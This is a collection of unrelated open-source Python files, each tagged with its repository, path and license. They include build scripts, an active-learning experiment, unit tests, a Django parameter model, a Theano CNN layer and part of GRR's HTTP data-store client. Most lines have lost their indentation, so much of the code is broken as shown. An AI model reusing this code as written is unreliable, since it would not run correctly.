pj_version = pj_version_major + "." + pj_version_minor
if pj_version_rev:
pj_version += "." + pj_version_rev
if pj_version_suffix:
pj_version += "-" + pj_version_suffix
#print 'PJ_VERSION = "'+ pj_version + '"'
# Get 'make' from environment variable if any
MAKE = os.environ.get('MAKE') or "make"
# Get targetname
f = os.popen("%s --no-print-directory -f helper.mak target_name" % MAKE)
pj_target_name = f.read().rstrip("\r\n")
f.close()
# Fill in extra_compile_args
extra_compile_args = []
f = os.popen("%s --no-print-directory -f helper.mak cflags" % MAKE)
for line in f:
extra_compile_args.append(line.rstrip("\r\n"))
f.close()
# Fill in libraries
libraries = []
f = os.popen("%s --no-print-directory -f helper.mak libs" % MAKE)
for line in f:
libraries.append(line.rstrip("\r\n"))
f.close()
# Fill in extra_link_args
extra_link_args = []
f = os.popen("%s --no-print-directory -f helper.mak ldflags" % MAKE)
for line in f:
extra_link_args.append(line.rstrip("\r\n"))
f.close()
# MinGW specific action: put current working dir to PATH, so Python distutils
# will invoke our dummy gcc/g++ instead, which is in the current working dir.
if platform.system()=='Windows' and os.environ["MSYSTEM"].find('MINGW')!=-1:
os.environ["PATH"] = "." + os.pathsep + os.environ["PATH"]
setup(name="pjsua2",
version=pj_version,
description='SIP User Agent Library based on PJSIP',
url='http://www.pjsip.org',
ext_modules = [Extension("_pjsua2",
["pjsua2_wrap.cpp"],
libraries=libraries,
extra_compile_args=extra_compile_args,
extra_link_args=extra_link_args
)
],
py_modules=["pjsua2"]
)
| pol51/PJSIP-CMake | pjsip-apps/src/swig/python/setup.py | Python | gpl-2.0 | 3,527 |
# start the service
twitter = Runtime.start("twitter","Twitter") | MyRobotLab/pyrobotlab | service/Twitter.py | Python | apache-2.0 | 64 |
__author__ = 'maru'
__copyright__ = "Copyright 2013, ML Lab"
__version__ = "0.1"
__status__ = "Development"
import sys
import os
sys.path.append(os.path.abspath("."))
from experiment_utils import *
import argparse
from sklearn.datasets.base import Bunch
from sklearn import linear_model
import time
from sklearn import metrics
from collections import defaultdict
from datautil.textutils import StemTokenizer
from strategy import randomsampling
from expert import baseexpert
import pickle
from datautil.load_data import *
############# COMMAND LINE PARAMETERS ##################
ap = argparse.ArgumentParser(description=__doc__,
formatter_class=argparse.RawTextHelpFormatter)
ap.add_argument('--train',
metavar='TRAIN',
default="20news",
help='training data (libSVM format)')
ap.add_argument('--neutral_threshold',
metavar='NEUTRAL',
type=float,
default=.4,
help='neutrality threshold of uncertainty')
ap.add_argument('--trials',
metavar='TRIALS',
type=int,
default=5,
help='number of trials')
ap.add_argument('--folds',
metavar='FOLDS',
type=int,
default=1,
help='number of folds')
ap.add_argument('--budget',
metavar='BUDGET',
type=int,
default=20000,
help='budget')
ap.add_argument('--step-size',
metavar='STEP_SIZE',
type=int,
default=10,
help='instances to acquire at every iteration')
ap.add_argument('--bootstrap',
metavar='BOOTSTRAP',
type=int,
default=50,
help='size of the initial labeled dataset')
ap.add_argument('--cost-function',
metavar='COST_FUNCTION',
type=str,
default="direct",
help='cost function of the x-axis [uniform|log|linear]')
ap.add_argument('--cost-model',
metavar='COST_MODEL',
type=str,
default="[[10.0,5.7], [25.0,8.2], [50.1,10.9], [75,15.9], [100,16.7], [125,17.8], [150,22.7], [175,19.9], [200,17.4]]",
help='cost function parameters of the cost function')
ap.add_argument('--fixk',
metavar='FIXK',
type=int,
default=10,
help='fixed k number of words')
ap.add_argument('--maxiter',
metavar='MAXITER',
type=int,
default=2000,
help='Max number of iterations')
ap.add_argument('--seed',
metavar='SEED',
type=int,
default=8765432,
help='Max number of iterations')
args = ap.parse_args()
rand = np.random.mtrand.RandomState(args.seed)
print args
print
def load_fixkdata(dataset_name, categories, min_size, vct):
fixk = [25, 50, 75, 100]
all_data = Bunch()
data1 = load_dataset(dataset_name, 10, categories[0], vct, min_size, percent=.5)
fixk_saved = "{0}{1}.p".format(dataset_name, 10)
try:
print "Loading existing file..."
fixk_file = open(fixk_saved, "rb")
data1 = pickle.load(fixk_file)
vectorizer = open("{0}vectorizer.p".format(dataset_name), "rb")
vct = pickle.load(vectorizer)
except IOError:
print "Loading from scratch..."
data1 = load_dataset(dataset_name, 10, categories[0], vct, min_size, percent=.5)
fixk_file = open(fixk_saved, "wb")
pickle.dump(data1, fixk_file)
vectorizer = open("{0}vectorizer.p".format(dataset_name), "wb")
pickle.dump(vct, vectorizer)
all_data['text'] = data1.train.data
all_data['train'] = data1.train.bow
all_data['10'] = data1.train
all_data['test'] = data1.test
all_data['target'] = data1.target
for k in fixk:
fixk_saved = "{0}{1}.p".format(dataset_name, k)
try:
fixk_file = open(fixk_saved, "rb")
data = pickle.load(fixk_file)
except IOError:
fixk_file = open(fixk_saved, "wb")
data = process_data(data1, k, 100, vct, silent=True)
pickle.dump(data, fixk_file)
data.train.data = None
all_data[str(k)] = data.train
return all_data
####################### MAIN ####################
def main():
accuracies = defaultdict(lambda: [])
aucs = defaultdict(lambda: [])
x_axis = defaultdict(lambda: [])
vct = CountVectorizer(encoding='ISO-8859-1', min_df=5, max_df=1.0, binary=True, ngram_range=(1, 3),
token_pattern='\\b\\w+\\b', tokenizer=StemTokenizer())
vct_analizer = vct.build_tokenizer()
print("Start loading ...")
# data fields: data, bow, file_names, target_names, target
########## NEWS GROUPS ###############
# easy to hard. see "Less is More" paper: http://axon.cs.byu.edu/~martinez/classes/678/Presentations/Clawson.pdf
categories = [['alt.atheism', 'talk.religion.misc'],
['comp.graphics', 'comp.windows.x'],
['comp.os.ms-windows.misc', 'comp.sys.ibm.pc.hardware'],
['rec.sport.baseball', 'sci.crypt']]
min_size = max(100, args.fixk)
# data = load_dataset(args.train, args.fixk, categories[0], vct, min_size)
    alldata = load_fixkdata(args.train, categories, min_size, vct)
print("Data %s" % args.train)
print("Data size %s" % len(alldata.train.data))
parameters = parse_parameters_mat(args.cost_model)
print "Cost Parameters %s" % parameters
cost_model = set_cost_model(args.cost_function, parameters=parameters)
print "\nCost Model: %s" % cost_model.__class__.__name__
#### STUDENT CLASSIFIER
clf = linear_model.LogisticRegression(penalty="l1", C=1)
print "\nStudent Classifier: %s" % clf
#### EXPERT CLASSIFIER
exp_clf = linear_model.LogisticRegression(penalty='l1', C=.3)
exp_clf.fit(alldata.test.bow, alldata.test.target)
expert = baseexpert.NeutralityExpert(exp_clf, threshold=args.neutral_threshold,
cost_function=cost_model.cost_function)
print "\nExpert: %s " % expert
#### ACTIVE LEARNING SETTINGS
step_size = args.step_size
bootstrap_size = args.bootstrap
evaluation_points = 200
print("\nExperiment: step={0}, BT={1}, plot points={2}, fixk:{3}, minsize:{4}".format(step_size, bootstrap_size,
evaluation_points, args.fixk,
min_size))
print ("Anytime active learning experiment - use objective function to pick data")
t0 = time.time()
tac = []
tau = []
### experiment starts
for t in range(args.trials):
trial_accu = []
trial_aucs = []
print "*" * 60
print "Trial: %s" % t
student = randomsampling.AnytimeLearner(model=clf, accuracy_model=None, budget=args.budget, seed=t, vcn=vct,
subpool=250, cost_model=cost_model)
print "\nStudent: %s " % student
train_indices = []
neutral_text = []
train_x = []
train_y = []
neu_x = []
neu_y = []
pool = Bunch()
pool.data = alldata.train.tocsr() # full words, for training
pool.text = alldata.text
# pool.fixk = data.train.bowk.tocsr() # k words BOW for querying
pool.target = alldata.target
pool.predicted = []
# pool.kwords = np.array(data.train.kwords) # k words
pool.remaining = set(range(pool.data.shape[0])) # indices of the pool
bootstrapped = False
current_cost = 0
iteration = 0
while 0 < student.budget and len(pool.remaining) > step_size and iteration <= args.maxiter:
if not bootstrapped:
## random from each bootstrap
bt = randomsampling.BootstrapFromEach(t * 10)
query_index = bt.bootstrap(pool=pool, k=bootstrap_size)
bootstrapped = True
query = pool.data[query_index]
print "Bootstrap: %s " % bt.__class__.__name__
print
else:
print "pick instance"
query_chosen = student.pick_next(pool=pool, step_size=step_size)
query_index = [a for a, b in query_chosen]
query_size = [b for a, b in query_chosen]
# query = pool.fixk[query_index] # query with k words
qk = []
for q, k in query_chosen:
qk.append(" ".join(vct_analizer(pool.text[q])[0:int(k)]))
query = vct.transform(qk)
# query_size = [len(vct_analizer(x)) for x in pool.kwords[query_index]]
ground_truth = pool.target[query_index]
#labels, spent = expert.label(unlabeled=query, target=ground_truth)
if iteration == 0: ## bootstrap uses ground truth
labels = ground_truth
spent = [0] * len(ground_truth) ## bootstrap cost is ignored
else:
print "ask labels"
labels = expert.label_instances(query, ground_truth)
spent = expert.estimate_instances(query_size)
### accumulate the cost of the query
query_cost = np.array(spent).sum()
current_cost += query_cost
useful_answers = np.array([[x, y] for x, y in zip(query_index, labels) if y is not None])
neutral_answers = np.array([[x, z] for x, y, z in zip(query_index, labels, query_size) if y is None]) \
if iteration != 0 else np.array([])
## add data recent acquired to train
if useful_answers.shape[0] != 0:
print "get training"
# train_indices.extend(query_index)
train_indices.extend(useful_answers[:, 0])
# add labels to training
train_x = pool.data[train_indices] # # train with all the words
# update labels with the expert labels
#train_y = pool.target[train_indices]
train_y.extend(useful_answers[:, 1])
if neutral_answers.shape[0] != 0: # # update neutral dataset, save index, sizek, labels
## todo craete neutral by separating the indicex and the k, then selecting accordingly
neutral = [" ".join(vct_analizer(pool.text[idoc])[0:fixk]) for idoc, fixk in neutral_answers.astype(int)]
neutral_text.extend(neutral)
## get the non-neutral instances
# neu_x = pool.text[train_indices]
neu_x = [pool.text[idoc] for idoc in train_indices]
neu_y = [1] * len(neu_x)
neu_x.extend(neutral_text)
neu_y.extend([0] * len(neutral_text))
neu_y = np.array(neu_y)
#end usefulanswers
if train_x.shape[0] != len(train_y):
raise Exception("Training data corrupted!")
# remove labels from pool
pool.remaining.difference_update(query_index)
# retrain the model
# current_model = student.train(train_x, train_y)
print "train models"
current_model = student.train_all(train_x, train_y, neu_x, neu_y)
print "evaluate"
# evaluate and save results
            y_probas = current_model.predict_proba(alldata.test.bow)
            auc = metrics.roc_auc_score(alldata.test.target, y_probas[:, 1])
            pred_y = current_model.classes_[np.argmax(y_probas, axis=1)]
            accu = metrics.accuracy_score(alldata.test.target, pred_y)
print ("TS:{0}\tAccu:{1:.3f}\tAUC:{2:.3f}\tCost:{3:.2f}\tCumm:{4:.2f}\tSpent:{5}\tneu:{6}".format(len(train_indices),
accu,
auc, query_cost,
current_cost,
spent, len(neutral_answers)))
## the results should be based on the cost of the labeling
if iteration > 0: # bootstrap iteration
student.budget -= query_cost ## Bootstrap doesn't count
x_axis_range = current_cost
x_axis[x_axis_range].append(current_cost)
## save results
accuracies[x_axis_range].append(accu)
aucs[x_axis_range].append(auc)
# partial trial results
trial_accu.append([x_axis_range, accu])
trial_aucs.append([x_axis_range, auc])
iteration += 1
# end of budget loop
tac.append(trial_accu)
tau.append(trial_aucs)
#end trial loop
accuracies = extrapolate_trials(tac)
aucs = extrapolate_trials(tau)
print("Elapsed time %.3f" % (time.time() - t0))
print_extrapolated_results(accuracies, aucs)
if __name__ == '__main__':
main()
| mramire8/active | experiment/anytimev2.py | Python | apache-2.0 | 13,575 |
#!/usr/bin/python
import os.path
import unittest
def get_tests():
start_dir = os.path.dirname(__file__)
return unittest.TestLoader().discover(start_dir, pattern="*.py") | kamaxeon/prpg | tests/__init__.py | Python | apache-2.0 | 177 |
## begin license ##
#
# "Digitale Collectie ErfGeo Enrichment" is a service that attempts to automatically create
# geographical enrichments for records in "Digitale Collectie" (http://digitalecollectie.nl)
# by querying the ErfGeo search API (https://erfgeo.nl/search).
# "Digitale Collectie ErfGeo Enrichment" is developed for Stichting DEN (http://www.den.nl)
# and the Netherlands Institute for Sound and Vision (http://instituut.beeldengeluid.nl/)
# by Seecr (http://seecr.nl).
# The project is based on the open source project Meresco (http://meresco.org).
#
# Copyright (C) 2011-2012, 2015 Netherlands Institute for Sound and Vision http://instituut.beeldengeluid.nl/
# Copyright (C) 2011-2012, 2015 Seecr (Seek You Too B.V.) http://seecr.nl
# Copyright (C) 2015 Stichting DEN http://www.den.nl
#
# This file is part of "Digitale Collectie ErfGeo Enrichment"
#
# "Digitale Collectie ErfGeo Enrichment" is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# "Digitale Collectie ErfGeo Enrichment" is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with "Digitale Collectie ErfGeo Enrichment"; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
## end license ##
from unittest import TestCase
from seecr.test import CallTrace
from meresco.core import Observable
from digitalecollectie.erfgeo.adoptoaisetspecs import AdoptOaiSetSpecs, prefixWithRepositoryGroupId, prefixWithCollection
class AdoptOaiSetSpecsTest(TestCase):
def testPrefixSetWithRepositoryGroupId(self):
observable = Observable()
adoptOaiSetSpecs = AdoptOaiSetSpecs(newSetSpecsFromOriginals=prefixWithRepositoryGroupId)
observer = CallTrace('observer')
observable.addObserver(adoptOaiSetSpecs)
adoptOaiSetSpecs.addObserver(observer)
__callstack_dict__ = {
'repositoryGroupId': 'x:y%z',
'setSpecs': ['set1', 'set2']
}
observable.do.addOaiRecord(
identifier='identifier',
setSpecs=['aSet'],
metadataPrefixes=['ese']
)
self.assertEquals(['addOaiRecord'], [m.name for m in observer.calledMethods])
self.assertEquals(
{
'identifier': 'identifier',
'metadataPrefixes': ['ese'],
'setSpecs': ['aSet', 'x:y%25z', 'x:y%25z:set1', 'x:y%25z:set2']
},
observer.calledMethods[0].kwargs
)
def testPrefixSetWithCollection(self):
observable = Observable()
adoptOaiSetSpecs = AdoptOaiSetSpecs(newSetSpecsFromOriginals=prefixWithCollection)
observer = CallTrace('observer')
observable.addObserver(adoptOaiSetSpecs)
adoptOaiSetSpecs.addObserver(observer)
__callstack_dict__ = {
'collection': 'collection1',
'setSpecs': ['set1']
}
observable.do.addOaiRecord(
identifier='identifier',
setSpecs=['aSet'],
metadataPrefixes=['ese']
)
self.assertEquals(['addOaiRecord'], [m.name for m in observer.calledMethods])
self.assertEquals(
{
'identifier': 'identifier',
'metadataPrefixes': ['ese'],
'setSpecs': ['aSet', 'collection1', 'collection1:set1']
},
observer.calledMethods[0].kwargs
)
def testSetAsIs(self):
observable = Observable()
adoptOaiSetSpecs = AdoptOaiSetSpecs()
observer = CallTrace('observer')
observable.addObserver(adoptOaiSetSpecs)
adoptOaiSetSpecs.addObserver(observer)
__callstack_dict__ = {
'repositoryGroupId': 'x:y%z',
'collection': 'collection1',
'setSpecs': ['set1']
}
observable.do.addOaiRecord(
identifier='identifier',
setSpecs=['aSet'],
metadataPrefixes=['ese']
)
self.assertEquals(['addOaiRecord'], [m.name for m in observer.calledMethods])
self.assertEquals(
{
'identifier': 'identifier',
'metadataPrefixes': ['ese'],
'setSpecs': ['aSet', 'set1']
},
observer.calledMethods[0].kwargs
)
| seecr/dc-erfgeo-enrich | test/adoptoaisetspecstest.py | Python | gpl-2.0 | 4,711 |
# $Id: setup.py 4429 2007-10-17 22:15:06Z ckuethe $
# Creates build/lib.linux-${arch}-${pyvers}/gpspacket.so,
# where ${arch} is an architecture and ${pyvers} is a Python version.
from distutils.core import setup, Extension
import os
import sys
needed_files = ['packet_names.h', 'gpsfake.1', 'gpsprof.1']
created_files = []
if not 'clean' in sys.argv:
if not os.path.exists('gpsd_config.h'):
sys.stderr.write('\nPlease run configure first!\n')
sys.exit(1)
for f_name in needed_files:
if not os.path.exists(f_name):
make_in, make_out = os.popen2('make %s' % f_name)
print make_out.read()
make_out.close()
make_in.close()
created_files.append(f_name)
extension_source = ["gpspacket.c", "packet.c", "isgps.c",
"rtcm.c", "strl.c", "hex.c"]
setup( name="gpspacket",
version="1.0",
ext_modules=[Extension("gpspacket", extension_source)],
py_modules = ['gpsfake','gps'],
data_files=[('bin', ['gpsfake','gpsprof']),
('share/man/man1', ['gpsfake.1','gpsprof.1'])]
)
| gnehzuil/GeoSVR | src/system/lib/gpsd-2.35/setup.py | Python | gpl-2.0 | 1,042 |
""" Class to handle date-parsing and formatting """
# Workaround for http://bugs.python.org/issue8098
import _strptime # pylint: disable=unused-import
from datetime import datetime
import time
class DateUtils(object):
""" Class to handle date-parsing and formatting """
date_format = '%Y-%m-%dT%H:%M:%SZ'
json_date_format = '%Y-%m-%dT%H:%M:%S.%fZ'
kodi_date_format = '%Y-%m-%d %H:%M'
def get_str_date(self, date):
"""
Formats datetime to str of format %Y-%m-%dT%H:%M:%SZ
Arguments
date: datetime
"""
return datetime.strftime(date, self.date_format)
def parse_str_date(self, str_date):
"""
Parse a date of format %Y-%m-%dT%H:%M:%SZ to date
Arguments
str_date: str, %Y-%m-%dT%H:%M:%SZ
"""
return self._parse_str_date(str_date, self.date_format)
def _parse_str_date(self, str_date, date_format):
try:
return datetime.strptime(str_date, date_format)
except TypeError:
return datetime(*(time.strptime(str_date, date_format)[0:6]))
    def parse_kodi_date(self, str_date):
        """
        Parse a Kodi date of format %Y-%m-%d %H:%M:%S; returns None if str_date is empty
        """
        if not str_date:
            return None
        return self._parse_str_date(str_date, '%Y-%m-%d %H:%M:%S')
def get_kodi_date_format(self, str_date):
"""
        Returns a date of format %Y-%m-%dT%H:%M:%S.%fZ as %Y-%m-%d %H:%M:%S
"""
parsed_date = self._parse_str_date(str_date, self.json_date_format)
return datetime.strftime(parsed_date, '%Y-%m-%d %H:%M:%S')
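# Illustrative usage sketch (not part of the original module):
#
#     utils = DateUtils()
#     date = utils.parse_str_date('2017-03-01T12:30:00Z')
#     utils.get_str_date(date)                  # '2017-03-01T12:30:00Z'
#     utils.get_kodi_date_format('2017-03-01T12:30:00.000Z')  # '2017-03-01 12:30:00'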
| sebastian-steinmann/kodi-repo | src/service.library.video/resources/lib/date_utils.py | Python | mit | 1,538 |
# coding: utf-8
"""
MAGE parameter module models and helpers file.
Useful functions (part of the API) are :
- getParam
- setParam
- getMyParams
- setOrCreateParam
@license: Apache License, Version 2.0
@copyright: 2007-2013 Marc-Antoine Gouillart
@author: Marc-Antoine Gouillart
"""
###############################################################################
##
## Minimalist parameters handling
##
###############################################################################
## Python imports
import sys
## Django imports
from django.db import models
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
##########################################################################
## Exceptions
##########################################################################
class ParamNotFound(Exception):
def __init__(self, kwargs):
self.query = kwargs
def __str__(self):
return u'Parametre mal specifié : %s' % self.query
class DuplicateParam(Exception):
def __init__(self, param):
self.param = param
def __str__(self):
return u'il existe deja un parametre répondant a cette définition : %s' % self.param
##########################################################################
## Model
##########################################################################
# Funny hack to create a "dynamic" static list...
def choice_list():
for application in settings.INSTALLED_APPS:
app_name = application.split('.')[0]
if app_name in ('django', 'crispy_forms', 'debug_toolbar'): continue
yield (app_name, app_name)
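# Illustrative note (not in the original file): with, for example,
# INSTALLED_APPS = ['django.contrib.admin', 'ref', 'scm'], choice_list()
# yields ('ref', 'ref') and ('scm', 'scm') -- the Django and helper apps
# are filtered out so only MAGE applications appear as choices.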
class MageParam(models.Model):
key = models.CharField(max_length=30, verbose_name=u'clé')
app = models.CharField(max_length=5, verbose_name=u'application', choices=choice_list())
value = models.CharField(max_length=100, verbose_name=u'valeur')
description = models.CharField(max_length=200, blank=True, null=True, verbose_name=u'description')
default_value = models.CharField(max_length=100, blank=True, null=True, verbose_name=u'valeur par défaut')
model = models.ForeignKey(ContentType, blank=True, null=True, verbose_name=u'modèle concerné', on_delete=models.CASCADE)
axis1 = models.CharField(max_length=30, verbose_name=u'classification optionnelle', blank=True, null=True)
restricted = models.BooleanField(default=False)
def __str__(self):
return u'[%s] %s : %s' % (self.app, self.key, self.value)
class Meta:
verbose_name = u'paramètre global'
verbose_name_plural = u'paramètres globaux'
ordering = ['app', 'key', ]
unique_together = [('key', 'app', 'model', 'axis1'), ]
##########################################################################
## API
##########################################################################
def getParam(key, **others):
"""
Retrieves a parameter.
This function hits the database, so it should be called as little as possible.
@return: the parameter value as a string (unicode).
@raise ParamNotFound: if the param cannot be found, or if multiple params were found.
"""
if others and 'app' in others: app = others['app']
else: app = sys._getframe(1).f_globals['__name__'].split('.')[0]
filters = others or {}
filters['app'] = app
filters['key'] = key
try:
return MageParam.objects.get(**filters).value
except (MageParam.DoesNotExist, MageParam.MultipleObjectsReturned):
raise ParamNotFound(filters)
def setOrCreateParam(key, value, **others):
if others and 'app' in others: app = others['app']
else: app = sys._getframe(1).f_globals['__name__'].split('.')[0]
args = others or {}
args['key'] = key
args['app'] = app
prm = MageParam.objects.get_or_create(**args)[0]
prm.value = value
prm.save()
def setParam(key, value, **others):
"""
Creates a new parameter
@return: nothing.
@raise DjangoExceptions: many Django model exceptions may be raised in this function
@raise DuplicateParam: in case of unicity constraint violation
"""
if others and 'app' in others: app = others['app']
else: app = sys._getframe(1).f_globals['__name__'].split('.')[0]
args = others or {}
args['key'] = key
args['app'] = app
args['value'] = value
try:
prm = getParam(**args) # Compulsory, as constraints on nullable fields may not be implemented in the db.
except ParamNotFound:
p = MageParam(**args)
p.save()
return
raise DuplicateParam(prm)
def getMyParams():
"""
@return: all the parameters of an application
"""
app = sys._getframe(1).f_globals['__name__'].split('.')[0]
return MageParam.objects.filter(app=app)
def getAllParams():
"""
@return: all the parameters of all applications
"""
return MageParam.objects.all()
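# Hedged usage sketch (not part of the original module); the key and value
# below are made-up examples.
#
#   setOrCreateParam('LOG_LEVEL', 'INFO')
#   getParam('LOG_LEVEL')      # -> u'INFO'
#   getMyParams()              # parameters of the calling application only
#
# getParam/setParam infer the calling application from the caller's module
# name (via sys._getframe), so the 'app' keyword is only needed when acting
# on behalf of another application.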
| marcanpilami/MAGE | ref/models/parameters.py | Python | apache-2.0 | 5,027 |
import theano.tensor as T
import theano
from theano.tensor.nnet import conv
from theano.tensor.signal import pool
import numpy as np
class CNNLayerWithMaxPool(object):
def __init__(self,rng,input,filter_shape,im_shape,pooling=(2,2)):
self.input = input
fin = filter_shape[1]*filter_shape[2]*filter_shape[3]
fout = filter_shape[0]*filter_shape[2]*filter_shape[3]/(pooling[0]*pooling[1])
self.W = theano.shared(
name='W',
value=np.asarray(
                # Float division keeps the Glorot bound from collapsing to zero under Python 2.
                rng.uniform(low=-np.sqrt(6.0/(fin+fout)),high=np.sqrt(6.0/(fin+fout)),size=filter_shape),
dtype=theano.config.floatX),
borrow=True
)
self.b = theano.shared(
name='b',
value=np.zeros((filter_shape[0],),dtype=theano.config.floatX),
borrow=True
)
conv_out = conv.conv2d(
input=input,
filters=self.W,
image_shape=im_shape,
filter_shape=filter_shape
)
maxpool_out = pool.pool_2d(
input=conv_out,
ds=pooling,
ignore_border=True
)
self.output = T.tanh(maxpool_out+self.b.dimshuffle('x',0,'x','x'))
self.params = [self.W,self.b]
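# Hedged usage sketch (not in the original file); the shapes follow the
# filter_shape/im_shape convention of the constructor above and the concrete
# numbers are illustrative assumptions only.
#
#   rng = np.random.RandomState(1234)
#   x = T.tensor4('x')
#   layer = CNNLayerWithMaxPool(rng, x,
#                               filter_shape=(20, 1, 5, 5),   # 20 filters over 1 channel, 5x5
#                               im_shape=(500, 1, 28, 28),    # batch of 500 28x28 images
#                               pooling=(2, 2))
#   f = theano.function([x], layer.output)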
| raghavgupta0296/Learning-Deep-Learning-Libraries | TheanoCNN/CNNLayer.py | Python | mit | 1,296 |
#encoding:utf-8
__authors__ = ['wei keke']
__version__ = "V0.1"
'''
# ChangeLog:
#---------------------------------------------------------------------------------
# Version Date Desc Author
#---------------------------------------------------------------------------------
# V0.1        2014/10/17       Initial version
#---------------------------------------------------------------------------------
'''
import TestData.Network.ITC06_Setup as ModuleData
from TestAPIs.DataCenterAPIs import DataCenterAPIs
'''
@note: PreData
'''
dc_name = ModuleData.dc_name
dc_id = DataCenterAPIs().getDataCenterIdByName(ModuleData.dc_name)
nw_name = 'network001'
nw_info = '''
<network>
<name>%s</name>
<data_center id= "%s"/>
</network>
''' %(nw_name,dc_id)
'''
@note:TestData
'''
new_nw_name = 'network002'
update_info = '''
<network>
<name>%s</name>
<description>lalala</description>
<mtu>2000</mtu>
</network>
'''%new_nw_name
'''
@note: ExpectedData
'''
expected_status_code = 200 | faylau/oVirt3.3WebAPITest | src/TestData/Network/ITC06010401_UpdateNetwork.py | Python | apache-2.0 | 1,115 |
#!/usr/bin/env python
"""A remote data store using HTTP."""
import base64
import binascii
import httplib
import random
import re
import socket
import threading
import time
import urlparse
import logging
from grr.lib import access_control
from grr.lib import config_lib
from grr.lib import data_store
from grr.lib import rdfvalue
from grr.lib import utils
from grr.lib.data_stores import common
from grr.lib.rdfvalues import data_server as rdf_data_server
from grr.lib.rdfvalues import data_store as rdf_data_store
from grr.lib.rdfvalues import protodict as rdf_protodict
from grr.server.data_server import auth
from grr.server.data_server import constants
from grr.server.data_server import utils as sutils
def CheckResponseStatus(response):
"""Catch error conditions from the response and raise them."""
# Common case exit early.
if response.status == rdf_data_store.DataStoreResponse.Status.OK:
return response
elif (response.status ==
rdf_data_store.DataStoreResponse.Status.AUTHORIZATION_DENIED):
raise access_control.UnauthorizedAccess(response.status_desc,
response.failed_subject)
elif response.status == rdf_data_store.DataStoreResponse.Status.TIMEOUT_ERROR:
raise data_store.TimeoutError(response.status_desc)
elif (response.status ==
rdf_data_store.DataStoreResponse.Status.DATA_STORE_ERROR):
raise data_store.Error(response.status_desc)
raise data_store.Error("Unknown error %s" % response.status_desc)
class Error(data_store.Error):
"""Base class for remote data store errors."""
pass
class HTTPDataStoreError(Error):
"""Raised when there is a critical error in the remote data store."""
pass
class DataServerConnection(object):
"""Represents one connection to a data server."""
def __init__(self, server):
self.conn = None
self.sock = None
self.lock = threading.Lock()
self.server = server
# Mark pending requests and subjects that are scheduled to change on
# the database.
self.requests = []
self._DoConnection()
def Address(self):
return self.server.Address()
def Port(self):
return self.server.Port()
def _ReadExactly(self, n):
ret = ""
left = n
while left:
data = self.sock.recv(left)
if not data:
raise IOError("Expected %d bytes, got EOF after %d" % (n, len(ret)))
ret += data
left = n - len(ret)
return ret
def _ReadReply(self):
try:
replylen_str = self._ReadExactly(sutils.SIZE_PACKER.size)
replylen = sutils.SIZE_PACKER.unpack(replylen_str)[0]
reply = self._ReadExactly(replylen)
response = rdf_data_store.DataStoreResponse.FromSerializedString(reply)
CheckResponseStatus(response)
return response
except (socket.error, socket.timeout, IOError) as e:
logging.warning("Cannot read reply from server %s:%d : %s",
self.Address(), self.Port(), e)
return None
def _Sync(self):
"""Read responses from the pending requests."""
self.sock.settimeout(config_lib.CONFIG["HTTPDataStore.read_timeout"])
while self.requests:
response = self._ReadReply()
if not response:
# Could not read response. Let's exit and force a reconnection
# followed by a replay.
# TODO(user): Maybe we need to assign an unique ID for each
# request so that the server knows which ones were already applied.
return False
self.requests.pop()
return True
def _SendRequest(self, command):
request_str = command.SerializeToString()
request_body = sutils.SIZE_PACKER.pack(len(request_str)) + request_str
self.sock.settimeout(config_lib.CONFIG["HTTPDataStore.send_timeout"])
try:
self.sock.sendall(request_body)
return True
except (socket.error, socket.timeout):
logging.warning("Could not send request to server %s:%d",
self.Address(), self.Port())
return False
def _Reconnect(self):
"""Reconnect to the data server."""
try:
if self.sock:
self.sock.close()
except socket.error:
pass
try:
if self.conn:
self.conn.close()
except httplib.HTTPException:
pass
try:
self.conn = httplib.HTTPConnection(self.Address(), self.Port())
username = config_lib.CONFIG.Get("HTTPDataStore.username")
password = config_lib.CONFIG.Get("HTTPDataStore.password")
if not username:
raise HTTPDataStoreError("HTTPDataStore.username not provided")
if not password:
raise HTTPDataStoreError("HTTPDataStore.password not provided")
# We ask the server for a nonce.
self.conn.request("POST", "/client/handshake", "", {})
response = self.conn.getresponse()
if response.status != constants.RESPONSE_OK:
logging.warning("Could not handshake the server %s:%d",
self.Address(), self.Port())
return False
# Generate the authentication token.
size_nonce = int(response.getheader("Content-Length"))
nonce = response.read(size_nonce)
rdf_token = auth.NonceStore.GenerateAuthToken(nonce, username, password)
token = rdf_token.SerializeToString()
# We trick HTTP here and use the underlying socket to pipeline requests.
headers = {"Content-Length": len(token)}
self.conn.request("POST", "/client/start", token, headers)
self.sock = self.conn.sock
# Confirm handshake.
self.sock.setblocking(1)
self.sock.settimeout(config_lib.CONFIG["HTTPDataStore.login_timeout"])
ack = self._ReadExactly(3)
if ack == "IP\n":
raise HTTPDataStoreError("Invalid data server username/password.")
if ack != "OK\n":
return False
logging.info("Connected to data server %s:%d",
self.Address(), self.Port())
return True
except httplib.HTTPException as e:
logging.warning("Httplib problem when connecting to %s:%d: %s",
self.Address(), self.Port(), str(e))
return False
except (socket.error, socket.timeout, IOError) as e:
logging.warning("Socket problem when connecting to %s:%d: %s",
self.Address(), self.Port(), str(e))
return False
return False
def _ReplaySync(self):
"""Send all the requests again."""
if self.requests:
logging.info("Replaying the failed requests")
while self.requests:
req = self.requests[-1]
if not self._SendRequest(req):
return False
self.sock.settimeout(config_lib.CONFIG["HTTPDataStore.replay_timeout"])
response = self._ReadReply()
if not response:
# Could not read response. Let's exit and force a reconnection
# followed by a replay.
# TODO(user): Maybe we need to assign an unique ID for each
# request so that the server knows which ones were already applied.
return False
self.requests.pop()
return True
def _DoConnection(self):
"""Cleanups the current connection and creates another one."""
started = time.time()
while True:
if self._Reconnect() and self._ReplaySync():
break
else:
logging.warning("Had to connect to %s:%d but failed. Trying again...",
self.Address(), self.Port())
# Sleep for some time before trying again.
time.sleep(config_lib.CONFIG["HTTPDataStore.retry_time"])
if time.time() - started >= config_lib.CONFIG[
"HTTPDataStore.reconnect_timeout"]:
raise HTTPDataStoreError("Could not connect to %s:%d. Giving up." %
(self.Address(), self.Port()))
def _RedoConnection(self):
logging.warning("Attempt to reconnect with %s:%d",
self.Address(), self.Port())
